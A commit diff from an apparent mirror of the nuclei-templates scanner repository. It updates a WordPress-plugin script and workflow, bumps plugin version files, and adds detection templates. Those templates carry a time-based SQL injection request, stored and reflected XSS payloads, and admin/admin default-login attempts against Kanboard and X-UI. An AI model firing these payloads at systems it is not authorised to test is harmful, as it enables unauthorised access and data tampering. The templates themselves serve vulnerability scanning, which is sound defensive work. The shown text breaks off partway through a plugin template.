daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:main' into pgsql_detect

patch-1
nybble04 2022-12-29 18:48:10 +04:00 committed by GitHub
parent 7e23fae3b4 7d08d97c73
commit a9c2622572
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
253 changed files with 588 additions and 729 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
.github/scripts/wordpress-plugins-update.py vendored
View File

@ -19,6 +19,7 @@ from bs4 import BeautifulSoup
import requests
import re
from markdown import markdown
import os
from termcolor import colored, cprint
# Regex to extract the name of th plugin from the URL
@ -123,8 +124,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{{{BaseURL}}}}/wp-content/plugins/{name}/readme.txt"
@ -159,14 +159,25 @@ requests:
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
'''
version_file = open(
f"helpers/wordpress/plugins/{name}.txt", "w")
work_dir = os.getcwd()
print(f"Current working directory: {work_dir}")
helper_dir = f"{work_dir}/helpers/wordpress/plugins"
template_dir = f"{work_dir}/technologies/wordpress/plugins"
if not os.path.exists(helper_dir):
os.makedirs(helper_dir)
if not os.path.exists(template_dir):
os.makedirs(template_dir)
helper_path = f"helpers/wordpress/plugins/{name}.txt"
version_file = open(helper_path, "w")
version_file.write(version)
version_file.close()
# print(template)
template_file = open(
f"technologies/wordpress/plugins/{name}.yaml", "w")
template_path = f"technologies/wordpress/plugins/{name}.yaml"
template_file = open(template_path, "w") # Dev environment
template_file.write(template)
template_file.close()

13
.github/workflows/wordpress-plugins-update.yml vendored
View File

@ -7,9 +7,6 @@ jobs:
Update:
runs-on: ubuntu-latest
steps:
- name: Install tree
run: sudo apt-get install tree -y
- name: Check out repository code
uses: actions/checkout@v3
with:
@ -25,20 +22,22 @@ jobs:
pip install -r .github/scripts/wordpress-plugins-update-requirements.txt
- name: Update Templates
id: update-templates
run: |
python3 .github/scripts/wordpress-plugins-update.py
git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT
- name: Commit files
if: steps.readme-update.outputs.CHANGES > 0
if: steps.update-templates.outputs.CHANGES > 0
run: |
git config --local user.email "action@github.com"
git config --local user.name "GitHub Action"
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:" -a
git add --all
git commit -m "Auto WordPress Plugins Update [$(date)] :robot:"
- name: Push changes
if: steps.readme-update.outputs.CHANGES > 0
if: steps.update-templates.outputs.CHANGES > 0
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.TOKEN }}
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}

230
.new-additions
View File

@ -1,230 +0,0 @@
cves/2021/CVE-2021-30128.yaml
cves/2021/CVE-2021-42887.yaml
cves/2022/CVE-2022-0786.yaml
cves/2022/CVE-2022-25082.yaml
cves/2022/CVE-2022-33891.yaml
cves/2022/CVE-2022-45362.yaml
default-logins/mobotix/mobotix-default-login.yaml
default-logins/tiny-file-manager-default-login.yaml
exposed-panels/content-central-login.yaml
exposed-panels/creatio-login-panel.yaml
exposed-panels/loxone-panel.yaml
exposed-panels/ncentral-panel.yaml
exposed-panels/posthog-admin-panel.yaml
exposed-panels/webuzo-admin-panel.yaml
exposed-panels/xfinity-panel.yaml
exposures/logs/ws-ftp-log.yaml
exposures/tokens/zenserp/zenscrape-api-key.yaml
exposures/tokens/zenserp/zenserp-api-key.yaml
exposures/tokens/zeplin/zeplin-access-token.yaml
exposures/tokens/zerobounce/zerobounce-api-token.yaml
iot/carel-plantvisor-panel.yaml
iot/hue-personal-wireless-panel.yaml
miscellaneous/gpc-json.yaml
misconfiguration/sony-bravia-disclosure.yaml
network/exposed-dockerd.yaml
technologies/akamai-cache-detect.yaml
technologies/aws/amazon-ec2-detect.yaml
technologies/wordpress/plugins/ad-inserter.yaml
technologies/wordpress/plugins/add-to-any.yaml
technologies/wordpress/plugins/admin-menu-editor.yaml
technologies/wordpress/plugins/adminimize.yaml
technologies/wordpress/plugins/advanced-custom-fields.yaml
technologies/wordpress/plugins/akismet.yaml
technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
technologies/wordpress/plugins/all-in-one-seo-pack.yaml
technologies/wordpress/plugins/all-in-one-wp-migration.yaml
technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
technologies/wordpress/plugins/amp.yaml
technologies/wordpress/plugins/antispam-bee.yaml
technologies/wordpress/plugins/astra-sites.yaml
technologies/wordpress/plugins/astra-widgets.yaml
technologies/wordpress/plugins/autoptimize.yaml
technologies/wordpress/plugins/backwpup.yaml
technologies/wordpress/plugins/better-search-replace.yaml
technologies/wordpress/plugins/better-wp-security.yaml
technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
technologies/wordpress/plugins/breadcrumb-navxt.yaml
technologies/wordpress/plugins/broken-link-checker.yaml
technologies/wordpress/plugins/child-theme-configurator.yaml
technologies/wordpress/plugins/classic-editor.yaml
technologies/wordpress/plugins/classic-widgets.yaml
technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
technologies/wordpress/plugins/cloudflare.yaml
technologies/wordpress/plugins/cmb2.yaml
technologies/wordpress/plugins/coblocks.yaml
technologies/wordpress/plugins/code-snippets.yaml
technologies/wordpress/plugins/coming-soon.yaml
technologies/wordpress/plugins/complianz-gdpr.yaml
technologies/wordpress/plugins/contact-form-7-honeypot.yaml
technologies/wordpress/plugins/contact-form-7.yaml
technologies/wordpress/plugins/contact-form-cfdb7.yaml
technologies/wordpress/plugins/cookie-law-info.yaml
technologies/wordpress/plugins/cookie-notice.yaml
technologies/wordpress/plugins/creame-whatsapp-me.yaml
technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
technologies/wordpress/plugins/custom-css-js.yaml
technologies/wordpress/plugins/custom-fonts.yaml
technologies/wordpress/plugins/custom-post-type-ui.yaml
technologies/wordpress/plugins/disable-comments.yaml
technologies/wordpress/plugins/disable-gutenberg.yaml
technologies/wordpress/plugins/duplicate-page.yaml
technologies/wordpress/plugins/duplicate-post.yaml
technologies/wordpress/plugins/duplicator.yaml
technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
technologies/wordpress/plugins/easy-fancybox.yaml
technologies/wordpress/plugins/easy-google-fonts.yaml
technologies/wordpress/plugins/easy-table-of-contents.yaml
technologies/wordpress/plugins/easy-wp-smtp.yaml
technologies/wordpress/plugins/elementor.yaml
technologies/wordpress/plugins/elementskit-lite.yaml
technologies/wordpress/plugins/enable-media-replace.yaml
technologies/wordpress/plugins/envato-elements.yaml
technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
technologies/wordpress/plugins/ewww-image-optimizer.yaml
technologies/wordpress/plugins/facebook-for-woocommerce.yaml
technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
technologies/wordpress/plugins/flamingo.yaml
technologies/wordpress/plugins/fluentform.yaml
technologies/wordpress/plugins/font-awesome.yaml
technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
technologies/wordpress/plugins/formidable.yaml
technologies/wordpress/plugins/forminator.yaml
technologies/wordpress/plugins/ga-google-analytics.yaml
technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
technologies/wordpress/plugins/google-listings-and-ads.yaml
technologies/wordpress/plugins/google-site-kit.yaml
technologies/wordpress/plugins/google-sitemap-generator.yaml
technologies/wordpress/plugins/gtranslate.yaml
technologies/wordpress/plugins/gutenberg.yaml
technologies/wordpress/plugins/happy-elementor-addons.yaml
technologies/wordpress/plugins/header-and-footer-scripts.yaml
technologies/wordpress/plugins/header-footer-code-manager.yaml
technologies/wordpress/plugins/header-footer-elementor.yaml
technologies/wordpress/plugins/header-footer.yaml
technologies/wordpress/plugins/health-check.yaml
technologies/wordpress/plugins/hello-dolly.yaml
technologies/wordpress/plugins/imagify.yaml
technologies/wordpress/plugins/imsanity.yaml
technologies/wordpress/plugins/insert-headers-and-footers.yaml
technologies/wordpress/plugins/instagram-feed.yaml
technologies/wordpress/plugins/intuitive-custom-post-order.yaml
technologies/wordpress/plugins/iwp-client.yaml
technologies/wordpress/plugins/jetpack.yaml
technologies/wordpress/plugins/kadence-blocks.yaml
technologies/wordpress/plugins/kirki.yaml
technologies/wordpress/plugins/leadin.yaml
technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
technologies/wordpress/plugins/limit-login-attempts.yaml
technologies/wordpress/plugins/litespeed-cache.yaml
technologies/wordpress/plugins/loco-translate.yaml
technologies/wordpress/plugins/loginizer.yaml
technologies/wordpress/plugins/loginpress.yaml
technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
technologies/wordpress/plugins/mailchimp-for-wp.yaml
technologies/wordpress/plugins/mailpoet.yaml
technologies/wordpress/plugins/maintenance.yaml
technologies/wordpress/plugins/mainwp-child.yaml
technologies/wordpress/plugins/malcare-security.yaml
technologies/wordpress/plugins/megamenu.yaml
technologies/wordpress/plugins/members.yaml
technologies/wordpress/plugins/meta-box.yaml
technologies/wordpress/plugins/ml-slider.yaml
technologies/wordpress/plugins/newsletter.yaml
technologies/wordpress/plugins/nextend-facebook-connect.yaml
technologies/wordpress/plugins/nextgen-gallery.yaml
technologies/wordpress/plugins/ninja-forms.yaml
technologies/wordpress/plugins/ocean-extra.yaml
technologies/wordpress/plugins/official-facebook-pixel.yaml
technologies/wordpress/plugins/one-click-demo-import.yaml
technologies/wordpress/plugins/optinmonster.yaml
technologies/wordpress/plugins/password-protected.yaml
technologies/wordpress/plugins/pdf-embedder.yaml
technologies/wordpress/plugins/photo-gallery.yaml
technologies/wordpress/plugins/php-compatibility-checker.yaml
technologies/wordpress/plugins/pixelyoursite.yaml
technologies/wordpress/plugins/polylang.yaml
technologies/wordpress/plugins/popup-builder.yaml
technologies/wordpress/plugins/popup-maker.yaml
technologies/wordpress/plugins/post-smtp.yaml
technologies/wordpress/plugins/post-types-order.yaml
technologies/wordpress/plugins/premium-addons-for-elementor.yaml
technologies/wordpress/plugins/pretty-link.yaml
technologies/wordpress/plugins/really-simple-captcha.yaml
technologies/wordpress/plugins/really-simple-ssl.yaml
technologies/wordpress/plugins/redirection.yaml
technologies/wordpress/plugins/redux-framework.yaml
technologies/wordpress/plugins/regenerate-thumbnails.yaml
technologies/wordpress/plugins/safe-svg.yaml
technologies/wordpress/plugins/seo-by-rank-math.yaml
technologies/wordpress/plugins/sg-cachepress.yaml
technologies/wordpress/plugins/sg-security.yaml
technologies/wordpress/plugins/shortcodes-ultimate.yaml
technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
technologies/wordpress/plugins/simple-custom-post-order.yaml
technologies/wordpress/plugins/simple-page-ordering.yaml
technologies/wordpress/plugins/siteguard.yaml
technologies/wordpress/plugins/siteorigin-panels.yaml
technologies/wordpress/plugins/smart-slider-3.yaml
technologies/wordpress/plugins/so-widgets-bundle.yaml
technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml
technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
technologies/wordpress/plugins/sucuri-scanner.yaml
technologies/wordpress/plugins/svg-support.yaml
technologies/wordpress/plugins/table-of-contents-plus.yaml
technologies/wordpress/plugins/tablepress.yaml
technologies/wordpress/plugins/taxonomy-terms-order.yaml
technologies/wordpress/plugins/the-events-calendar.yaml
technologies/wordpress/plugins/themeisle-companion.yaml
technologies/wordpress/plugins/tinymce-advanced.yaml
technologies/wordpress/plugins/translatepress-multilingual.yaml
technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
technologies/wordpress/plugins/under-construction-page.yaml
technologies/wordpress/plugins/unyson.yaml
technologies/wordpress/plugins/updraftplus.yaml
technologies/wordpress/plugins/use-any-font.yaml
technologies/wordpress/plugins/user-role-editor.yaml
technologies/wordpress/plugins/velvet-blues-update-urls.yaml
technologies/wordpress/plugins/w3-total-cache.yaml
technologies/wordpress/plugins/webp-converter-for-media.yaml
technologies/wordpress/plugins/widget-importer-exporter.yaml
technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
technologies/wordpress/plugins/woo-variation-swatches.yaml
technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
technologies/wordpress/plugins/woocommerce-payments.yaml
technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
technologies/wordpress/plugins/woocommerce-services.yaml
technologies/wordpress/plugins/woocommerce.yaml
technologies/wordpress/plugins/woosidebars.yaml
technologies/wordpress/plugins/wordfence.yaml
technologies/wordpress/plugins/wordpress-importer.yaml
technologies/wordpress/plugins/wordpress-seo.yaml
technologies/wordpress/plugins/worker.yaml
technologies/wordpress/plugins/wp-fastest-cache.yaml
technologies/wordpress/plugins/wp-file-manager.yaml
technologies/wordpress/plugins/wp-google-maps.yaml
technologies/wordpress/plugins/wp-mail-smtp.yaml
technologies/wordpress/plugins/wp-maintenance-mode.yaml
technologies/wordpress/plugins/wp-migrate-db.yaml
technologies/wordpress/plugins/wp-multibyte-patch.yaml
technologies/wordpress/plugins/wp-optimize.yaml
technologies/wordpress/plugins/wp-pagenavi.yaml
technologies/wordpress/plugins/wp-reset.yaml
technologies/wordpress/plugins/wp-sitemap-page.yaml
technologies/wordpress/plugins/wp-smushit.yaml
technologies/wordpress/plugins/wp-statistics.yaml
technologies/wordpress/plugins/wp-super-cache.yaml
technologies/wordpress/plugins/wp-user-avatar.yaml
technologies/wordpress/plugins/wpcf7-recaptcha.yaml
technologies/wordpress/plugins/wpcf7-redirect.yaml
technologies/wordpress/plugins/wpforms-lite.yaml
technologies/wordpress/plugins/wps-hide-login.yaml
technologies/wordpress/plugins/yith-woocommerce-compare.yaml
technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
vulnerabilities/amazon/amazon-ec2-ssrf.yaml
vulnerabilities/other/digital-ocean-ssrf.yaml
vulnerabilities/thinkphp/thinkphp6-lang-lfi.yaml

2
README.md
View File

@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags,
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
**328 directories, 4791 files**.
**335 directories, 5229 files**.
</td>
</tr>

3
cves/2020/CVE-2020-35476.yaml
View File

@ -4,10 +4,11 @@ info:
name: OpenTSDB <= 2.4.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: "OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory."
description: OpenTSDB through 2.4.0 and earlier is susceptible to remote code execution via the yrange parameter written to a gnuplot file in the /tmp directory.
reference:
- https://github.com/OpenTSDB/opentsdb/issues/2051
- https://nvd.nist.gov/vuln/detail/CVE-2020-35476
- http://packetstormsecurity.com/files/170331/OpenTSDB-2.4.0-Command-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8

3
cves/2022/CVE-2022-23854.yaml
View File

@ -10,11 +10,12 @@ info:
- https://packetstormsecurity.com/files/cve/CVE-2022-23854
- https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854
- https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02
classification:
cve-id: CVE-2022-23854
metadata:
verified: true
shodan-query: http.html:"InTouch Access Anywhere"
verified: "true"
tags: lfi,packetstorm,cve,cve2022,aveva,intouch
requests:

47
cves/2022/CVE-2022-3768.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2022-3768
info:
name: WPSmartContracts < 1.3.12 - Author SQLi
author: Hardik-Solanki
severity: high
description: |
The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author
remediation: Fixed in version 1.3.12
reference:
- https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768
- https://nvd.nist.gov/vuln/detail/CVE-2022-3768
- https://cve.report/CVE-2022-3768
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-3768
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&uid=1 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration_2>=5'
- 'status_code_2 == 200'
- 'contains(content_type_2, "text/html")'
- 'contains(body_2, "Batch Mint NFTs")'
condition: and

66
cves/2022/CVE-2022-4260.yaml Normal file
View File

@ -0,0 +1,66 @@
id: CVE-2022-4260
info:
name: WP-Ban < 1.69.1 - Admin Stored XSS
author: Hardik-Solanki
severity: high
description: |
The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
remediation: Fixed in version 1.69.1
reference:
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
classification:
cve-id: CVE-2022-4260
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
Host: {{Hostname}}
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
- |
GET / HTTP/1.1
Host: {{Hostname}}
Referer: XSS
host-redirects: true
max-redirects: 2
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_4, "<script>alert(document.domain);</script>")'
- 'contains(content_type_4, "text/html")'
- 'status_code_4 == 200'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '_wpnonce=([0-9a-z]+)'
internal: true

32
cves/2022/CVE-2022-46381.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2022-46381
info:
name: Certain Linear eMerge E3-Series - Cross Site Scripting
author: arafatansari
severity: medium
description: |
Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381
- https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt
metadata:
verified: "true"
shodan-query: http.html:"Linear eMerge"
tags: cve,cve2022,xss,emerge,linear
requests:
- method: GET
path:
- '{{BaseURL}}/badging/badge_template_v0.php?layout=1&type="/><svg/onload="alert(document.domain)"/>'
matchers-condition: and
matchers:
- type: word
words:
- '<svg/onload="alert(document.domain)"/>'
- 'Badging Template'
condition: and
- type: status
status:
- 200

60
default-logins/kanboard-default-login.yaml Normal file
View File

@ -0,0 +1,60 @@
id: kanboard-default-login
info:
name: Kanboard Default Login
author: shelled
severity: high
description: Kanboard default login was discovered.
reference:
- https://twitter.com/0x_rood/status/1607068644634157059
- https://github.com/kanboard/kanboard
- https://docs.kanboard.org/v1/admin/installation/
metadata:
verified: true
shodan-query: http.favicon.hash:2056442365
tags: default-login,kanboard
requests:
- raw:
- |
GET /?controller=AuthController&action=login HTTP/1.1
Host: {{Hostname}}
- |
POST /?controller=AuthController&action=check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&csrf_token={{csrf_token}}
- |
GET /?controller=DashboardController&action=show HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin
extractors:
- type: regex
name: csrf_token
part: body
internal: true
group: 1
regex:
- "hidden\" name=\"csrf_token\" value=\"([0-9a-z]+)\""
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'New project'
- 'Project management'
condition: and
case-insensitive: true
- type: status
status:
- 200

48
default-logins/xui-weak-login.yaml Normal file
View File

@ -0,0 +1,48 @@
id: xui-weak-login
info:
name: X-UI Login Default Login
author: dali
severity: high
description: |
X-UI Default Login Credentials.
reference:
- https://github.com/vaxilu/x-ui
- https://seakfind.github.io/2021/10/10/X-UI/#:~:text=By%20default%2C%20the%20login%20user,the%20password%20is%20also%20admin%20.
classification:
cwe-id: CWE-798
metadata:
verified: "true"
shodan-query: title:"X-UI Login"
tags: x-ui,default-login
requests:
- method: POST
path:
- "{{BaseURL}}/login"
headers:
content-type: application/x-www-form-urlencoded
body: "username={{username}}&password={{password}}"
attack: pitchfork
payloads:
username:
- "admin"
password:
- "admin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200

30
exposed-panels/atlantis-detect.yaml Normal file
View File

@ -0,0 +1,30 @@
id: atlantis-detect
info:
name: Atlantis Detect
author: jonathanwalker
severity: info
reference:
- https://github.com/runatlantis/atlantis
metadata:
verified: true
shodan-query: http.favicon.hash:-1706783005
tags: panel,atlantis
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'title="atlantis'
- 'Lock'
condition: and
- type: status
status:
- 200

30
exposed-panels/kanboard-login.yaml Normal file
View File

@ -0,0 +1,30 @@
id: kanboard-login
info:
name: Kanboard Login Panel
author: DhiyaneshDK
severity: info
description: A Kanboard login panel was detected.
classification:
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:2056442365
tags: panel,kanboard
requests:
- method: GET
path:
- '{{BaseURL}}'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- '/?controller=UserAjaxController&amp;action=status'
- type: status
status:
- 200

20
exposures/tokens/zeplin/zeplin-access-token.yaml
View File

@ -1,20 +0,0 @@
id: zeplin-access-token
info:
name: Zeplin Access Token
author: ritikchaddha
severity: info
reference:
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zeplin/zeplin.go
- https://app.zeplin.io/profile/developer
tags: exposure,token,zeplin
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '([a-zA-Z0-9-.]{350,400})'

21
exposures/tokens/zerobounce/zerobounce-api-token.yaml
View File

@ -1,21 +0,0 @@
id: zerobounce-api-token
info:
name: Zerobounce API Token
author: ritikchaddha
severity: info
reference:
- https://github.com/trufflesecurity/trufflehog/blob/main/pkg/detectors/zerobounce/zerobounce.go
- https://www.zerobounce.net/docs/email-validation-api-quickstart
tags: exposure,token,zerobounce,api
requests:
- method: GET
path:
- "{{BaseURL}}"
extractors:
- type: regex
part: body
regex:
- '([a-z0-9]{32})'

2
helpers/wordpress/plugins/ad-inserter.txt
View File

@ -1 +1 @@
2.7.22
2.7.23

2
helpers/wordpress/plugins/all-404-redirect-to-homepage.txt
View File

@ -1 +1 @@
3.8
4.1

2
helpers/wordpress/plugins/all-in-one-wp-migration.txt
View File

@ -1 +1 @@
7.68
7.69

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
3.1.20
3.1.21

2
helpers/wordpress/plugins/coblocks.txt
View File

@ -1 +1 @@
2.25.4
2.25.5

2
helpers/wordpress/plugins/complianz-gdpr.txt
View File

@ -1 +1 @@
6.3.6.1
6.3.9

2
helpers/wordpress/plugins/contact-form-7.txt
View File

@ -1 +1 @@
5.7.1
5.7.2

2
helpers/wordpress/plugins/custom-post-type-ui.txt
View File

@ -1 +1 @@
1.13.3
1.13.4

2
helpers/wordpress/plugins/duplicate-page.txt
View File

@ -1 +1 @@
4.4.9
4.5

2
helpers/wordpress/plugins/easy-wp-smtp.txt
View File

@ -1 +1 @@
1.5.2
1.5.3

2
helpers/wordpress/plugins/elementor.txt
View File

@ -1 +1 @@
3.9.1
3.9.2

2
helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt
View File

@ -1 +1 @@
5.5.1
5.5.2

2
helpers/wordpress/plugins/font-awesome.txt
View File

@ -1 +1 @@
4.3.1
4.3.2

2
helpers/wordpress/plugins/forminator.txt
View File

@ -1 +1 @@
1.21.0
1.22.1

2
helpers/wordpress/plugins/google-listings-and-ads.txt
View File

@ -1 +1 @@
2.3.3
2.3.5

2
helpers/wordpress/plugins/google-site-kit.txt
View File

@ -1 +1 @@
1.89.0
1.90.1

2
helpers/wordpress/plugins/gutenberg.txt
View File

@ -1 +1 @@
14.7.3
14.8.3

2
helpers/wordpress/plugins/leadin.txt
View File

@ -1 +1 @@
9.2.12
9.2.81

2
helpers/wordpress/plugins/mailpoet.txt
View File

@ -1 +1 @@
4.2.0
4.3.0

2
helpers/wordpress/plugins/meta-box.txt
View File

@ -1 +1 @@
5.6.14
5.6.15

2
helpers/wordpress/plugins/ml-slider.txt
View File

@ -1 +1 @@
3.28.0
3.28.2

2
helpers/wordpress/plugins/photo-gallery.txt
View File

@ -1 +1 @@
1.8.5
1.8.8

2
helpers/wordpress/plugins/post-smtp.txt
View File

@ -1 +1 @@
2.2.1
2.2.3

2
helpers/wordpress/plugins/premium-addons-for-elementor.txt
View File

@ -1 +1 @@
4.9.44
4.9.45

2
helpers/wordpress/plugins/really-simple-ssl.txt
View File

@ -1 +1 @@
6.0.12
6.0.14

2
helpers/wordpress/plugins/seo-by-rank-math.txt
View File

@ -1 +1 @@
1.0.103.1
1.0.105

2
helpers/wordpress/plugins/so-widgets-bundle.txt
View File

@ -1 +1 @@
1.45.0
1.46.0

2
helpers/wordpress/plugins/tablepress.txt
View File

@ -1 +1 @@
1.14
2.0.1

2
helpers/wordpress/plugins/translatepress-multilingual.txt
View File

@ -1 +1 @@
2.4.3
2.4.4

2
helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt
View File

@ -1 +1 @@
2.1.1
2.2.0

2
helpers/wordpress/plugins/webp-converter-for-media.txt
View File

@ -1 +1 @@
5.5.1
5.6.1

2
helpers/wordpress/plugins/woocommerce-payments.txt
View File

@ -1 +1 @@
5.1.2
5.2.0

2
helpers/wordpress/plugins/woocommerce.txt
View File

@ -1 +1 @@
7.2.0
7.2.2

2
helpers/wordpress/plugins/wordpress-seo.txt
View File

@ -1 +1 @@
19.12
19.13

2
helpers/wordpress/plugins/wp-statistics.txt
View File

@ -1 +1 @@
13.2.8
13.2.10

2
helpers/wordpress/plugins/wp-user-avatar.txt
View File

@ -1 +1 @@
4.4.1
4.5.1

2
network/exposed-dockerd.yaml
View File

@ -2,7 +2,7 @@ id: exposed-dockerd
info:
name: Docker Daemon Exposed
author: arafat
author: arafatansari
severity: critical
description: |
Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.

5
technologies/favicon-detect.yaml
View File

@ -2640,3 +2640,8 @@ requests:
name: "Leica RefWorx"
dsl:
- "status_code==200 && (\"-1054477011\" == mmh3(base64_py(body)))"
- type: dsl
name: "Liferay"
dsl:
- "status_code==200 && (\"-2024949122\" == mmh3(base64_py(body)))"

3
technologies/wordpress/plugins/ad-inserter.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt"

3
technologies/wordpress/plugins/add-to-any.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt"

3
technologies/wordpress/plugins/admin-menu-editor.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt"

3
technologies/wordpress/plugins/adminimize.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt"

3
technologies/wordpress/plugins/advanced-custom-fields.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt"

3
technologies/wordpress/plugins/akismet.yaml
View File

@ -13,8 +13,7 @@ info:
requests:
